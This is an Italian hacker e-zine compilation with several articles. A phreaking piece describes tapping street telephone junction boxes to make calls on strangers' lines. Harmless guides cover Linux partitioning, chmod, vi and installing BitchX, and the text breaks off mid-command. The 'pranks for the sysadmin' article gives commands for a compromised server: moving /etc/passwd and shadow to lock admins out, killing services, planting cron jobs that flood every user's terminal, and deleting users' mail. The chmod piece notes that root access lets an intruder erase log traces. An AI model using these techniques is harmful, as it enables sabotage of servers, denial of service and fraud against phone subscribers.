raccogliermi un passwd da terra non vi piegate....potreste perdere la vostra verginita' anale. bye il vostro anonimo ۰۰۰۰۰۰۰۰۰۰۰۰ ۲۰۰۰۲۰۰۲۰۰۰۰۰۰۰ ۰۰۰۰۰۰۰۰۰۰۰ ۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰ ۰۰۰۰۰۰۰۰۰۰۰۰۰۰ TELECUM BruTe FORCIN' Non penso di aver mai scritto un disclaimer ad un mio articolo ma ora lo faccio...bisogna provare tutto no ??? Allora...se siete dei normali phreaker...credete a tutto quello che ho scritto..ma se siete della Digos...della pula...della madama...o anke vorreste tanto mettermi in gabbione, allora dovete essere certi al 100% che tutto quello che scrivo e' a titolo puramente informativo...che non ho mai utilizzato tutte le tecniche sotto descritte (hihihi)...e che sono un bastardissimo pischelletto. Allora....la dedica...MMMmmmm non so se c'e' ne bisogno.... vabbe'....dai la scrivo.... ThiS Art. Is DeD 2 : MsBLiSs^ **My Sweethearth** & Adry **The MaMa** + in generale al canale in cui mi sbatto ogni sera.... #cacca .. e non dite che e' un canale di merda!!!! (irc.stealth.net - irc.tin.it) And so the Vs-DeD is against : A colui che mi ha detto di riuscire a crackare in linguaggio BINARIO !!!!! (cavolo se lo sai fare veramente...sei semplicemente un genio !!!!ahahahhaah) LAMER schifoso! Vi vorrei deliziare un poketto parlandovi del Forcin' delle varie cabine e centraline....forse + in generale di cio' che un povero comune mortale phreaker Italiano puo' fare per cercare di inkulare il sistema verde bianco rosso. Ovviamente se l'argomento non vi interessa siete pregati di non leggervelo oppure di cancellarlo....oppure stamaparlo e pulirvici il sederino.In definitiva non mi frega una mazzetta...fate quello che vi pare...non siamo noi che parliamo sempre di Anarchy ?? Tutto quello di cui vi parlero' e' frutto di esperienza personale.... quindi se ve lo dico...credeteci...non sparo fregnate.Poi se non ci volete credere...ripeto....a me ke mi frega ??? Passiamo all'articolo vero e proprio... Io divido il TeleCum brute Forcin' in 3 possibili varianti 1-Cab forcin' 2-Street forcin' 3-House forcin' Ora vi spieghero' con calma le affinita' e le differenze tra i 3 tipi di forcin'. Cab Forcing. Beh sapete tutti che passeggiando per la strada vi capita di tanto in tanto di imbattervi in degli affari di colore bianco e rosso con una scritta del tipo TELECOM...quegli aggeggi frega soldi sono spesso e volentieri chiamati cabine. (cazspita come sono colto!!!) Le cabine che abbiamo qui' in Italia sono di 3 tipi: Quelle vecchie solo a gettoni, quelle a gettoni ed a scheda e quelle + nuove che hanno un unico blocco e che possono leggere solo schede. Da ora in poi sappiate che la mia esperienza si e' svolta su di una cabina di tipo B cioe' scheda e gettoni. Il cab forcin' consiste nel riuscire ad allacciarsi ad i cavi che trasportano la linea alla cabina...facile no ??? Ed invece e' impossibile o quasi ed ora vi spiego perke' : Bene....a parte il fatto che riuscire a trovare questi cavi e' una roba a dir poko impossibile perke' i tecnici non sono dei fessi e non lasciano mai i cavi scoperti, in + anke riusciendo a trovare questi fili, a scuoiarli ed ad attacarvi un telefono, questi dopo un breve fruscio, non dara' + segni di vita !!!! Come mai ??? semplice...il segnale che arriva alle cabine e' codificato! non e' lo stesso segnale che arriva a casa nostra!!! ________ | | <-----ecco dove mi sono collegato io ! ( c'erano solo 2 fili ) | i cavetti che arrivano ad una cabina variano di numero | possono essere 2 ma anke 4 |^^^^^^^^| | ===== | | |^| | | | | |____ | | | | | | _ ^ | == | | |_| | | | |____| ^^^^^^^^^^ Cammino per strada e cosa vedo ??? una cabina in cui i fili non erano stati murati bensi' percorrevano un lungo tratto lungo il muro. Cavolo per una volta i tecnici erano stati dei fessi...avevano lasciato i cavi alla portata di tutti....eppure...cavolo avevano pensato anke a questo. Dopo aver provato mille combinazioni...preso varie volte una leggera scossa di 48V (una anke sulla punta del naso) ho deciso di lasciar perdere....dentro alle cabine vi e' un particolare diodo preposto alla decodificazione del segnale. Dopo aver riattaccato con dello scotch trasparente i cavetti alla cabina mi sono accorto che la cabina, che fino ad allora aveva lampeggiato come una pazza, inviando kissa' quali segnali alla centralina che la logga, aveva ripreso tranquillamente a fungere. Abbiamo ripristinato il funzionamento della cabina solo in vista del prossimo attacco in cui (speriamo) saremo in grado di decodificare il segnale. 2-Street Forcing. Beh questo...provato e riprovato + volte ha sempre sortito i suoi effetti. Abbastanza facile come tecnica consiste nel trovare una di quelle centraline da cui si dirama il segnale ad una intera zona della citta', aprirla possibilmente senza fare troppo casino, e collegarvici il vostro caro telefono da Phreaker ( tastierino...attacco per auricolari e microf. con 2 fili che ne fuoriescono, in modo tale che sia il + piccolo il + maneggevole e pratico possibile). Questa tecnica vi assicuro che funge regolarmente, certo i consigli che vi posso dare sono vari: non andateci sempre un determinato giorno della settimana, non lo fate regolarmente ( use not abuse ), ogni volta che lo usate cambiate linea e non preoccupatevi di prendere troppe precauzioni. Con questa tecnica a dir poco infima, in quanto quello che viene fregato non e' Mr. Telecom ma un normale utente, il sottoscritto e' riuscito finalmente a parlare con la sua Net-girl-friend....alias MsBLiSs^. Ora vi direte...kakkio sei proprio uno scorzone malefico...non avevi mai chiamato la tua net-girl-friend ??? Io prontamente vi rispondo...beh...se fosse stata qui' nella mia stessa citta' l'avrei chiamata ogni giorno...se fosse stata in Italia l'avrei chiamata almeno una volta alla setimana...ma poRco GateS...lei abita a Sidney in Australia !!!!! Da casa non me la sentivo proprio di chiamare...(le bollette sono gia' salatissime) dalla cabina con una scheda telefonica avrei parlato per max. 5 minuti.... ed allora cosa dovevo fare ???? hihihih in fondo erano solo 2.200 e' al min. e ci ho parlato solo per qualke ora....e poi ero sulla linea di un supermercato. E cosi' mi ritrovavo verso le 3 le 4 di notte..(il fuso mi aiutava)..seduto su di un marciapiede...con un cappuccio in testa..con un freddo della madonna...con un auricolare nell'orecchio ed un microfono vicino alla bokka...a parlare in Inglese con una bottiglia di birra tra le gambe...(se si fosse avvicinato qualkuno avrebbe pensato a me come un normale punkabbestia seduto per strada a scolarsi il suo nettare e non mi avrebbe rotto le balle + di tanto). _____________________ /___________________ /| Aperta la centralina vi ho trovato un | | | parallelepipedo di questo genere al posto | | | dei pallini vi erano delle viti che portavano | | | la linea....(sempre 2 cavetti per linea) | | | | |/ ^^^^^^^^^| ||^^^^^^^^ | || | |/ 3-House Forcing. Bene l'ho kiamato house forcin' perke' e' da farsi a casa altrui... altrimenti lo avrei chiamato home forcin' giusto ??? e' molto simile allo street forcin' ma si differenzia nel fatto che non si smonta nessuna cabina ma si agisce direttamente sui cavi che portano la linea ad una casa...oppure direttamente su di una presa del telefono.... Questa tecninca personalmente l'ho usata solo un paio di volte..l'ho usata a scuola nel nostro laboratorio di informatica dove il comp aveva un collegamento ad internet ma la presa del telefono non consentiva l'attacco di una normale presa maschio a 3 poli. Ho semplicemente smontato la presa..scuoiato i cavetti ed attaccato il mio fedele telefono...semplice ed efficace...a parte il fatto che mentre attaccavo i cavetti...beh...qualkuno ha avuto la malsana idea di telefonare a scuola...mi e' squillato in mano....diciamo che lo squillo mi e' arrivato fino al cervello...non erano + solo 48V !!!! \\\\\\||||||||||||||////// \\\\\||||||||||||||///// \\\\||||||||||||||//// \\\||||||||||||||/// \\||||||||||||||// \||||||||||||||/ ^^^^^^^^^^^^^^ <-----Ecco come si presentava la mia | 0 0 | faccia dopo la scossa | / |e' (praticamente avevo i capelli di | /_ | Diego Abatantuono stile old school) | | | () | \__________/ Beh ora mi sono rotto e voglio uscire un po' di casa...sono le 20:01... ora mi faccio una bella doccia mi vesto e poi sgommo...saluto tutti quelli che conosco....il canale #hackernow gli SPP con l'enorme voglia di reincontrarli presto e poi Nobody e ULNT..con la speranza che tornino prestissimo. Dante Alighieri ۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰ ۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰ ۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰ ۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰ ۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰ ͻ Ŀ COME PARTIZIONARE L'HD X LINUX ٺ ͼ Allora, premetto prima di entrare nella parte "calda" dell'argomento ke io, lo Z10-K41i (kalifornia) non sono assolutamente un hacker e skrivo quest'artikolo essenzialmete a skopo educativo e quindi di eventuali infortuni informatici io non sono direttamente ne indirettamente responsabile. (sono responsabile solo se c'e lucro). ihih Allora perke' skrivo quest'artikolo su liniz ? Perke' un bel po' di tempo fa quando avevo bisogno di installare linuz nessuno lo sapeva fare, anzi quelli ke mi cirkondano al massimo sanno kome si accende un pc (alkuni nemmeno quello ). Kome si installa questo benedetto linuzzzz? BHOOOOOOOOOOOOOOOO Ci sono diverse strade da prendere :c'e' la strada brecciata e quella non la faccio di skuro, c'e la strada statale, quella nemmeno c'e' il limite dei 50 km. e c'e la suprestr...............bastaaaaaaaaaa!!!!!!!!!!!! arrivo al sodo c'e' l'autostrada ed e' quella ke far0'. BANDO ALLE CIANCIE allora per installare linux e winkozza ci sono diversi modi: quello teoriko sarebbe di fare una partizione primaria dos per winkozza, una estesa non formattata non dos nativa per Linux (dove risiede il linuzzo) e la partizione estesa non formattata di swap (ke serve al linux kome area di swap) [ne sapete peggio di prima eeheh:))))] Per fare tutto cio' senza tagliarvi potete usare partition magic (dove lo trovate?) kiedetelo a me se proprio siete kosi' lamah!! Kome funzika ? FATE A: --------> pmagic ---------> t (create a new partition) ---------> b (beginning) per iniziare e vi fate la prima partizione windows quella primaria dos. Trovate poi tra le opzioni la scelta dello spazio residuo e lo prendete e poi andate su opzioni e fate una partizione unformatted (letteralmente unformatted kome skritto su partition magik). Volete sapere la strada + corta per non fare errori ?[komincio a tagliare senno' mi prendono le krisi] SSSSSSSSSSSSIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII ok. Formattate tutto (la vostra famiglia pure se ne avete bisogno) e non fate semplicemente nulla cioe' fate la partizione con fdisk (a pc formattato mi rakkomando) kome partizione primaria e poi installate winzozzo !!! E linuzz?????? E nattimo !! mo arriva pure lui.... prendete dopo aver fatto tutto cio' il solito Partizionatore magico e lo mettete nel vostro lettore floppy........fate pmagcic e diko e tra le opzioni avanzate troverete la vostra lettere r e cio' RESIZE metterete di quanto volete farlo e il gioko e' fatto.. non farete altro ke ridimensionare (uaooo ke parolona) il vostro spazio per la winkozza gia' installata . Dopodike' andrete sul vostro BIOS e metterete il boot da cd (quello lo dovete fare da soli senno' lasciate perde il pc e datevi alla peska di trote) e quando metterete il vostro cd di linuz lui partira' farete enter......... Quando arriverete al punto cruciale dove vi verranno mostrate le partizioni presenti sul vostro pc e vedrete solo quella ridimensionata di winzozzo ne farete kon lo stesso cd di linuz una native per lui e una swap mettendo nella native il simboletto / . Il gioko e' fatto !!! Ah dimentikavo il boot mettetelo nel Master Boot rekord ok ?? :)))))))) Lo Z10 vi inkoraggia a fare prove prove e prove fino a ke' kon la vostra ignoranza non riuscirete a mettere il benedetto linux. Ma allora voi vi kiederete perke' proprio linux devo mettere per diventare un newbies ? Perke' Linux e' il sistema operativo + bakato e perke' i lameroni dei sys penzano alle loro mogli e quindi lasciano tutto a voi kapito ?????????????? Quindi gambe in spalla e provate provate provate se avete qualke probl io lo zio sono su #hackernow e se non ci sono ci sono perzone in grado di aiutarvi ugualmente. CIAO a PResto. A Hacker think different as a kracker!!!kali ccccccc hhh hhh mmm mmm oooooooo dd dd ccc h h m mm mm m o o d dd cc h h m mm mm m o o d dd c hhhhhhh m mmmm m o o d dd cc h h m mm m o o d dd ccc h h m m o o d dd ccccccc hhh hhh mmm mmm oooooooo dddd ...ovvero la gestione dei permessi su file e directory in linux e unix... Allora quando mi e' stato commissionato questo articolo all'inizio ho parlato con N0body88 e ho obbiettato con lui che tale articolo (nonostante fosse alla mia portata) fosse troppo facile/scontato. Il ragionamento che mi ha fatto lui allora mi ha fatto poi cambiare idea facendomi capire che anke le cose facili x quanto stupide (come questo art) possono essere d'aiuto x chi non le conosce che quindi giova dal fatto di poter avere un caz di art del caz col quale cercare di capire una cosa x la quale altrimenti dovrebbe andare a consultare un (quasiasi) manuale di *nix. Il mio nome e' EsPoNeNtIaL FoRcE e sono felice di poter essere d'aiuto a qualcuno (ma lo saro'??). Si comincia... 1 PUNTO: COME SI PRESENTA L'USCITA DEL COMANDO LS Prima di tutto per cambiare i permessi dobbiamo sapere cosa sono e dove trovarli, o meglio come vederli. Il nostro file system di *nix ci mostra i vari file e directory con i loro attributi se usiamo il comune e conosciuto comando "ls -l" che sta per long listing cioe' al postop del solito "ls" dove ci vengono mostrati solo i nomi di file e directory con il nuovo modo di usare ls (equivalente al comando dos "dir") possiamo visualizzare nuove e (forse) sconosciute informazioni sui file in lista le cui caratteristiche andremo subito a spiegare. Segue l'output di un semplice ls -al: $ ls -l total 1 -rw-rw-rw- 1 michele utenti 22 May 31 02:35 appunti drwxrwxrwx 2 michele utenti 134 May 31 02:49 urlinteressanti 2 PUNTO: COSA SIGNIFICANO I PERMESSI IMPOSTATI Allora dai dati sopra scritti credo che siano intuibili quelli indicanti l'ora e la data di ultim modifica dei file o directory, quelli riguardanti il nome ( e ci mancherebbe altro) ma cosa stanno a significare quelle stringe iniziali "-rw-rw-rw-" e "drwxrwxrwx" ? Dato che gli *nix sono sistemi multiutenti ogni utente puo' crearsi ed avere i propri file ma come fa a non farli vedere e/o cambiare e/o cancellare dagli altri utenti? Ed e' qui che entra in funzione il sistema dei permessi. Ad ogni file e directory infatti (tra gli attributi) vi sono i permessi che si presentano nella forma della colonna + a sinistra del ns esempio. Direte voi...si vabbe ma che vogliono di che lo voi di??? E io: nu moment!!! Allora la prima lettera dei permessi (che le 1 caso manca e nel secondo e' segnata con una "d") serve a farci capire se cio' che vediamo e' un file, una dir, un simlink o un file speciale. LETTERA SPIEGAZIONE - sta ad indicare un semplice file d sta ad indicare una directory normale l sta ad indicare un collegamento simbolico, cioe' un simlink b oppure c sta ad indicare un file speciale, utilizzato x controllare I/O con periferiche E le altre lettere direte voi??? Per le altre lettere tranquillizzatevi che non vi sono molte opzioni come visto poc'anzi (anche se dovete ammettere che non e' poi tanto difficile sto elenchetto da ricordare). Per le rimanenti 9 posizioni sono divise in: 3 --> dedicate a cio' che puo' fare il possessore del file o della directory. 3 --> dedicate a cio' che possono fare gli appartenenti allo stesso gruppo di cui fa parte l'utente possessore del gruppo. 3 --> dedicate a cio' che possono fare gli utenti che non sono il possessore del file e che non fanno neanche parte delllo stesso gruppo del possessore. In ognuno di questi tre gruppi ovviamente la fanno da padroni rwx che stanno a significare ripettivamente: r = read = se e' attivo questo permesso si puo' leggere il file in questione. w = write = se e' attivo questo si puo' modificare il file in questione via editor o ridirigendo l'uscita. x = execution = se e' attivo questo si puo' eseguire il file come un comando. Questo per quanto riguarda i file, ma x quanto riguarda le directory? Eccoci: r = read = se e' attivo indica che il soggetto in questione puo' analizzare il contenuto della directory (es: con "ls") w = write = se e' attivo l'utente puo' creare un file nella directory. x = execution = se e' attivo l'utent puo' addentrarsi nelle sottodirectory della directory che stiamo analizzando. 3 PUNTO: COME CAMBIARE I PERMESSI Adesso che avete capito come funzionano i permessi potete capire che se vi loggate in una shell l'unico modo x cancellare il vostro ip e user dai log e' quello di andare a modificare i log file che pero' hanno un piccolo problemino... possono essere modificati solo dal root cioe l'amministratore di sistema (l'aspirazione di ogni hacker in un sistema hackato) ed e' per tale motivo che si rende necessario diventare root dopo essere entrato in un sistema come utente proprio x aver il "permesso" tanto agognato per non poter essere rintracciati e quindi puniti ;) Lo so che e' una cazzata e che il 99% di voi lo sapeva gia' ma..xche' non dare una mano a chi e' nuovo e ha voglia di imparare? Cmq questa parte e' dedicata al modo in cui e' possibile cambiare il permesso di uno o + file e/o directory ed e' questo che affronteremo vedendo l'uso del comando "chmod" (change mode a intuizione (miii che genio!)). Ovviamente voi potete cambiare solamente i diritti dei file di cui siete proprietari, e se siete root potrete cambiare...tutto :D Chmod funziona con un semplice schemetto qua sotto espresso: chmod unodeitregruppi +/- unoopiudeiservizi nomefile chmod g -w appunti Spieghiamo innanzitutto come si intendono i 3 gruppi nel comando "chmod": --> u = user = proprietario del file --> g = group = utente facente parte dello stesso gruppo del proprietario --> o = other = tutti gli altri A questo punto quindi e' facile capire dall'esempio seguente: $ ls -l total 1 -rw-rw-rw- 1 michele utenti 22 May 31 02:35 appunti $ chmod g -w appunti $ ls -l total 1 -rw-r--rw- 1 michele utenti 22 May 31 02:35 appunti $ chmod g +w appunti $ ls -l total 1 -rw-rw-rw- 1 michele utenti 22 May 31 02:35 appunti Se ne deduce quindi che con il segno + si attiva un servizio mentre col segno - si toglie un servizio. Allo stesso modo si possono cambiare servizi a tutti i tre gruppi: $ ls -l total 1 -rw-rw-rw- 1 michele utenti 22 May 31 02:35 appunti $ chmod -w appunti $ ls -l total 1 -r--r--r-- 1 michele utenti 22 May 31 02:35 appunti $ chmod +w appunti $ ls -l total 1 -rw-rw-rw- 1 michele utenti 22 May 31 02:35 appunti Altrettanto facilmente si possono cambiare + servizi anke tra loro discordanti perfino in + gruppi diversi. Esempio: $ ls -l total 1 -rw-rw-rw- 1 michele utenti 22 May 31 02:35 appunti $ chmod go -w+x appunti $ ls -l total 1 -rw-r-xr-x 1 michele utenti 22 May 31 02:35 appunti $ chmod go +w-x appunti $ ls -l total 1 -rw-rw-rw- 1 michele utenti 22 May 31 02:35 appunti Il comando chmod puo' pero' essere passato con un argomento numerico che indica la classe di utente e il diritto di accesso da cambiare come seguenza di bit. Ma consiglio a chi non e' ancora pratico con la sintassi sopra usata di cercare di capire bene il metodo sopra spiegato (o armeno c'ho provato) e di avvicinarsi a tale metodo solo in seguito. Per ulteriori notizie prima di chiamare l'amico smanettone provate a digitare nel vostro linux "man chmod" e non lamentatevi perche cio' che c'e' e' in inglese ma pregate dio (e i primi veri hackers) ogni gg per il fatto che ci sia li' qualsivoglia voi ne abbiate bisogno... Dedicato a N0bodY88 che mentre mi credevo migliore degli altri mi ha preso da parte e mi ha fatto ricordare che anche io all'inizio avevo avuto qualcuno al mio fianco che era pronto a risponderti alle 3 di notte su canali dal nome mezzo mistico e mezzo fantasioso... Direttamente dall'agglomerato EsPoNeNtIaL FoRcE Be CyBeRpUnK - CyBeRpUnK iS a StAtE Of mInD Be HaCkEr - HaCkEr Is A sTaTe Of MiNd AnD rEmEmBeR...u MuSt ThInk OnLy WiTh YoUr BrAin...SuRe...If U hAvE iT ;) "Perche' faccio questo? perche' mi diverto. Il giorno che non mi divertiro' piu' buttero' via il computer." Ovviamente (e aspettatamente) dal profondo del cuore un grosso fak alle multinazionali...la caccia e' aperta...i buchi sono tanti...noi siamo in d+ ͻ Ŀ SCHERZI SIMPATICI DA FARE AL SYSADMIN ٺ ͼ Articolo su scherzi simpatici da combinare al Sysadmin -CIAK 2- PREMESSA: io non mi ritengo responsabile del cattivo uso delle informazioni contenute in questo documento, che e' SOLO a scopo EDUCATIVO. INTRODUZIONE: e' inutile negarlo, sto riscrivendo da capo quest'articolo dopo una interruzione mentre l'avevo quasi finito... (con la storia che "Linux non crasha mai" mi ero abituato a non salvare... non ho tenuto in considerazione un fulmine pero'...). Beh, spero vi rendiate conto che se fate cose del genere non rimarrete certo in ombra nel sistema... :) OK, si comincia! 1- come far restare le pagine web modificate in linea per una vita :) Allora, direi che molti di noi hanno provato almeno una volta a modificare le pagine web di un sito. Ma quante volte ci e' capitato che le nostre modifiche sparissero dopo poche ore? molte... Grazie a questo trafiletto questo non succedera' PIU'!!!! Allora, mettiamo che abbiamo appena finito di uppare le nostre pagine modificate... Ora se il root joinasse si accorgerebbe subito dello scambio e rimetterebbe le cose a posto. Quindi il nostro obiettivo e' impedire che il root joini =) Capisco che queste cose si ripercuoteranno sul vostro accesso, pero'... non pensavate di mantenerlo, vero? Dovete innanzitutto muovere /etc/passwd (mv /etc/passwd /percorsochevolete /nomefile) in modo da non consentire l'accesso a nessuno (nel caso il sistema sia dotato di shadow passwd, muovete quella). E se volessimo fare successive modifiche alle nostre pagine? ok, eccovi accontentati: touch /etc/passwd e poi aggiungeteci il vostro account. In questo modo potrete collegarvi solo col vostro user e la vostra password :) (nel caso il sistema sia dotato di shadow password, sara' necessario operare modifiche in entrambi i file). Ora e' prevedibile un colpo di coda del sysadmin, che si trovera' ad un bivio: o reinstallare tutto (in quanto non ha piu' accesso al sistema) oppure hackerare il proprio sistema... (non pensate che lo faccia lui, chiamera' un amico hacker). Quindi dobbiamo rendere il sistema inattaccabile! Visto che non ci interessa mantenere altri servizi oltre al WWW, killate i processi che implicano connessioni col mondo esterno (sendmail, pop3, ftp..) e dedicatevi alla ricerca di CGI-BIN dannose per il sistema. Quando le avete trovate eliminatele, poi cercatele di nuovo e fatevi consigliare da un amico piu' esperto. A questo punto il sistema dovrebbe avere aperte le porte 23 e 80 (ed eventualmente potrete in seguito riaprire la 21 per i pochi minuti necessari ad uppare le nuove pagine). Per maggiore sicurezza (come se spostare il file della passwd non bastasse) potete muovere il file /etc/securetty e poi fare un touch /etc/securetty in modo da ricrearlo vuoto. Se fate questo pero' non avrete neppure voi l'accesso al sistema, occhio! (direi che muovere i passwd e le shadow e' piu' che sufficiente ndPk) A questo punto chiamate tutti i vostri amici, parenti, conoscenti, mandate un fax alle maggiori reti televisive e radiofoniche e invitate tutto il mondo a visitare la vostra opera d'arte (scherzo, non fate i coglioni)!!! Ad un certo punto se avete fatto un buon lavoro il sysadmin sara' costretto a reinstallare tutto (non che sia una cosa gradevole da dire, ma certi siti meriterebbero un format istantaneo), con poco gaudio da parte nostra che ci avremo perso in immagine. Meditate gente, meditate... PS: questa tecnica puo' essere usata per sospendere tutti i servizi di un server. In questo caso killate pure httpd e non scrivete niente nel file della password... Risultato: un server in coma! :) ERGO: non fate i cazzoni... non fate tutto questo con tutti i siti che trovate... giusto con quelli dei pedofili... ok? Di seguito inseriro' altri scherzi carini per sopravvivere felici e informatizzati :) 2- goliardia & crontab: un connubio perfetto :) E' possibile far eseguire un file in un certo momento grazie a Crontab... vi fa venire in mente niente questo? :) Ad esempio immaginatevi un tranquillo server inglese... sono le ore 4:59 del pomeriggio e 6 utenti, tra cui il root, sono placidamente collegati e si fanno gli affari loro... tutto questa pace viene sconvolta pochi secondi dopo: tutti gli utenti vedono apparire milioni di volte sul proprio schermo la frase "It's time for tea!!!!!!!" e la rete diventa rallentatissima... gli utenti cercano di stoppare il programma ma il lag e' cosi' enorme che ci metteranno qualche decina di secondi a killarlo e intanto avranno terminato quello che stavan facendo prima, a furia di ^C... Tutto questo ovviamente a meno che il server non rebooti direttamente per la quantita' spropositata di materiale inviato... Al termine della devastante operazione tutti si renderanno conto di essere stati giocati da un hacker... AHAHAHAHAHHAHAHAHAHAAH! Vi e' piaciuta la storia? Beh, grazie a crontab lo potete fare anche voi! Cominciate a prendere il sorgente dello script di cui parlavo: ------------------------cut-here---------------- #include int main() { int n; while (n = 2) { printf("It's time for tea!!!!!!!!"); } } ------------------------cut-here---------------- L'ho fatto io ma chiunque con un minimo di conoscienza lo potrebbe fare... e' di una semplicita' disarmante e al tempo stesso piuttosto divertente :) Bene, compilatelo con un nome che non dia nell'occhio e spostatevi in /var/spool/crontab (o cron, a seconda delle versioni). Qui troverete un numero variabile di file (da 0 a parecchi), i file che regolano quando vengono eseguiti programmi in automatico!!! Allora, prendete i login degli utenti dal file della pass (usate cat > /etc/passwd) e inserite un 0 16 * * * /file/tea Significa: Al primo minuto (0-59) delle ore 17 (0-23) esegui il file /file/tea per questo utente. Inserendolo per tutti gli utenti... :) Per la cronaca, i campi asteriscati rappresentano giorno del mese, mese dell'anno e giorno della settimana. (man crontab). Eh eh... bello :) 3- Filez interessanti: /etc/motd Il messaggio del giorno.. c'e' da dire altro? Implementazione 1: rm /etc/motd, cat /etc/passwd >> /etc/motd Implementazione 2: echo "Oggi un hacker vi ha inculato a sangue" >> /etc/motd /etc/issue Il messaggio prima del login Implementazione 1: rm /etc/issue, echo "Mi sono preso la liberta' di ridisegnare il sistema..." >> /etc/issue cartella /var/spool/mail Implementazione 1: inserite in una o piu' mail frasi altamente offensive... :) Implementazione 2: leggete le mail e cancellate quelle importanti... :) 4- messaggi senza mittente Semplice ed utile a spaventare gli utenti inesperti :) prendete il tty di un utente dal comando w, e usate: echo "Sono un pedofilo... adesso vengo li' e ti inculo" >> /dev/tty (dove tty e' il tty dell'utente) Il bersaglio vedra' la frase tra le virgolette come se fosse l'output di un comando... :) Ovviamente un po di fantasia non guasta mai... se avete la fortuna di beccare il root: cat /etc/passwd >> /dev/tty ihihihihihih poraccio :) E' tutto limitato alla vostra fantasia... :) Beh, abbiamo finito questa carrellata di piccole cattiverie... vi avviso pero' che se fate qualcosa del genere a casaccio, giusto per provare, meritate di bruciare in salamoia. Qualcuno di voi dira': bravo, e tu come le hai provate? Sul mio sistema :( Ihihihihih pankrazio [ps di zerocool bhe se non siete pazzi come il nostro amiko pank non fate mai quello che e'descritto qua [per ovvvie ripercussioni legalizzzzzz [a meno che non siate strabravissimiz]]]. ͻ Ŀ TABELLUZZA DI VI ٺ ͼ Primo articolo in collaborazione col NobuZ...heheh inutile dire che le mie dediche sono: Thi$ aRt i$ dEd t0: FaRe le 5 di mattina leggendoci Zines e documenti sull'hack crack...and a lotta otherS stuff. tH|5 4rT |5 Vs-D3D To: Il sonno che fanno venire le BirroZZe....... specialmente quando si arriva a non ricordare quante se ne sono bevute.... ;) Articolo....stampa--->taglia-&->tieni sempre a portata di mano! _________________________________________________________________________ | TABELLUZZA VI by Dantuz & NobuZ | |_________________________________________________________________________| | Per Entrare in modalit di inserimento| Spostamento del cursore | |^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^| | i prima del cursore | nG alla linea n | | dopo il cursore | l un posto a destra | | l all'inizio della linea | spazio un posto a destra | | A alla fine della linea | h un posto a sinistra | | O apertura linea precedente | backspace un posto a sinistra | | o apertura linea successiva | j una linea sotto | | | + una linea sotto | |_______________________________________| k una linea sopra | | Delete | - una linea sopra | |^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^| $ fine di linea | | dw cancella la parola | . ^ inizio di linea | | dd cancella la linea | w parola successiva | | D fino alla fine della linea | e fine di parola | | x carttere sul cursore | b parola precedente | | | | |_______________________________________|_________________________________| | Altre funzioni | Sostituzione | |^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^| | u annulla ultima modifica | cw sostituzione di parola | / ricerca in avanti | cc sostituzione di linea| | ? ricerca a ritroso | C fino a fine di linea | | n istanza successiva | r carattere sul cursore| | . ripete l'ultima azione | R fino a escape | | Y accantona la linea |_________________________________| | y accantona la linea | Controllo del video | | p inserisci sotto |^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^| | P inserisci sopra | CTRL-D scorrimento video in | | " marcatore | avanti | | ZZ scrive ed esce | CTRL-U scorrimento video a | | esc cancella il comando | ritroso | |_______________________________________| CTRL-F schermata successiva | | Modalita' di ultima linea | CTRL-B schermata precedente | |^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^| CTRL-L riformazione del video | :w scrive file |_________________________________| | :q esce | In modalita' inserimento | | :wq scrive ed esce |^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^| | :n file successivo | Backspace cancella carattere | | :r legge il file | CTRL-W cancella parola | | :e elabora il file | esc modalita' comando | | :f nome del file |_________________________________| | CTRL-G nome del file | Cazzate | | :set modifca le opzioni |^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^| | .! uscita allo shell | Mi e' avanzato lo spazio e mi | | :n linea n | sembrava brutto lasciarlo vuoto | | :addr salta alla linea addr | allora ci ho scritto 2 caxxate | |_______________________________________|_________________________________| Benissimo....la tabella ve la stamperete e ritaglierete e magari l'avrete sempre accanto al computer...ma il resto dell'articolo lo cestinerete subito dopo....quindi che caxxo lo scrivo a fare ?? boh?!?!?!?! Unico mio consiglio quello di imparare ad usare bene questo criptico programma dato che se vi doveste trovare in un qualsiasi sistema Unix-like l'editor in cui di sicuro incapperete sara' questo....certo ce ne sono molti altri e molto + semplici ma il "vi" e' lo standard... imparare ad usarlo e' d'obbligo...bye bye Bisogna studiare la normalita' per riuscire ad essere veramente anormali ! Dante Alighieri.....N0bodY88......NewBies Staff........ ͻ Ŀ MINI GUIDA ALL'INSTALLAZIONE DI BITCHX SOTTO UNIX OS ٺ ͼ by \JusTme\ ______________________________________________________________ Sito ufficiale da cui si puo' scaricare BitchX: ftp.bitchx.com Elenco degli OS su cui puo' girare BitchX: -Windows 95/98/NT -BSDI 2.0/2.1/3.0 -SunOS 4.1.4/5.3/5.4/5.5/5.5.1 -Linux [Tutte] -IRIX -HP-UX 9.x/10.x -OSF/1 [DEC Alpha] -FreeBSD -DEC Unix -Ultrix -AIX Ok lo so che potete benissimo leggervi la documentazione su BitchX e le varie FAQ (e vi rimando a queste se dopo aver seguito i comandi sotto riportati dovessero sorgere dei problemi di compilazione a causa dell' OS o per qualche altro motivo) ma per i neofiti che vogliono installare il BitchX sul loro bel Linuzzo fresco fresco di configurazione ppp e che si sono rotti i coglioni di quello schifo di X-Chat che gira sotto XWindows perche' sembra uno stupido client fatto in VB o in Delphi e perche' gli mancano troppe opzioni, credo sia molto piu' semplice e veloce seguire questi pochi comandi per l'installazione. Oltre a questo ho spesso avuto modo di vedere gente su IRC lamentarsi perche' non riusciva a installare BitchX. Poi, a voi la scelta ;) Ok, let`z go.. Scaricate il file ircii-pana-xx-xx.tar.gz dal sito FTP ed eseguite questi comandi da root: gzip -d ircii-pana-xx-xx.tar.gz tar xvf 